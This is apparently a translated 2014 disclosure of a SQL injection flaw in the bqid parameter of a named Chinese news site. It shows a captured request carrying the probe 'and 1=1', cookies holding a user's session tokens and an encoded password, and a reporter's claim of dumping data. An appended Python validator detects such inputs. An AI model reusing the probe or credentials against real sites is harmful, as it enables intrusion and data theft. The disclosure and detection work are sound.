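2014-01-06: Details reported to the vendor; awaiting vendor handling
2014-01-11: The vendor has actively ignored the vulnerability; details disclosed to the public
As the title says.
I saw that my previous report was put through the small-vendor process, which doesn't seem right to me. I just hadn't dumped the tables, that's all, and the amount of data involved is quite large. So, not willing to let it go, I found another injection point: http://t.caijing.com.cn/bq/?bqid=187. Captured request: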
GET /bq/?bqid=663%20and%201=1 HTTP/1.1
Host: t.caijing.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=114738197.1746900344.1387729153.1388580033.1388835670.4; __utmz=114738197.1388835670.4.3.utmcsr=tongji.baidu.com|utmccn=(referral)|utmcmd=referral|utmcct=/web/welcome/login; Hm_lvt_b0bfb2d8ed2ed295c7354d304ad369f1=1387549340,1387708558,1387729409,1388835670; cj_cms_iploc=CN3100_20131215133402572; SA_USER_USER_SCHOLARSHIP=1; LOGOUT_FLAG=1; JishiGou_qUBe90_auth=d1acn%2FF3vvWtIZ2oONUFScH6Q8rDrH3HWKBmlt84iqka7gyF5lMgU%2FWtQIRHnhZIssioyiXB6foD1O%2FzG3tYmM3EboE; SA_USER_NICK_NAME=wqer; [email protected]; SA_USER_USER_PWD=MTIzcXdl; SA_USER_USER_TYPE=0; SA_USER_USER_ACTIVE=1; UID=6546358; Hm_lpvt_b0bfb2d8ed2ed295c7354d304ad369f1=1388835816; __utmb=114738197.17.10.1388835670; __utmc=114738197; GUID=978384137; lastTime=1388835807090; firstTime=1388835807090; point=1388851199000; GID30=978384137
Connection: keep-alive
Cache-Control: max-age=0
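After that there is not much to say.
Super detailed information. With 89 fields' worth of information, how detailed do you think it is? I only dumped a tiny bit of data. Could the admins also upgrade my previous report to major vendor? Finally, please don't make this one small vendor..
Asking for a gift,
Severity: no impact (ignored by vendor)
Ignored at: 2014-01-11 18:45
None yet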
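From the defender's side, the captured request above carries non-numeric text in `bqid`, so it can be rejected at input validation and flagged in access logs. The following is an added example, not code from the report or the affected site; it assumes `bqid` is meant to be a plain decimal identifier, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer IDs (the page does not show server code).
INT_PARAMS = {"bqid"}
INT_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length


def parse_int_id(raw):
    """Server-side guard: return the id as int, or raise ValueError.

    The integer should then be passed to the database as a bound
    parameter, never concatenated into the SQL text.
    """
    if not INT_RE.fullmatch(raw):
        raise ValueError("id parameter is not a plain decimal integer")
    return int(raw)


def suspicious_params(request_line, int_params=INT_PARAMS):
    """Return (name, decoded value) for integer-only params carrying other text."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    # Some servers log the target with literal spaces; rejoin everything
    # between the method and the trailing HTTP version token.
    if len(parts) >= 3 and parts[-1].startswith("HTTP/"):
        target = " ".join(parts[1:-1])
    else:
        target = " ".join(parts[1:])
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in int_params and not INT_RE.fullmatch(value):
            hits.append((name, value))
    return hits


# Constructed sample request lines: the first matches the request on this page.
SAMPLE_LINES = [
    "GET /bq/?bqid=663%20and%201=1 HTTP/1.1",
    "GET /bq/?bqid=187 HTTP/1.1",
    "GET /bq/?bqid=663 and 1=1 HTTP/1.1",
]


def scan(lines):
    """Return only the lines that contain a malformed integer parameter."""
    return [line for line in lines if suspicious_params(line)]
```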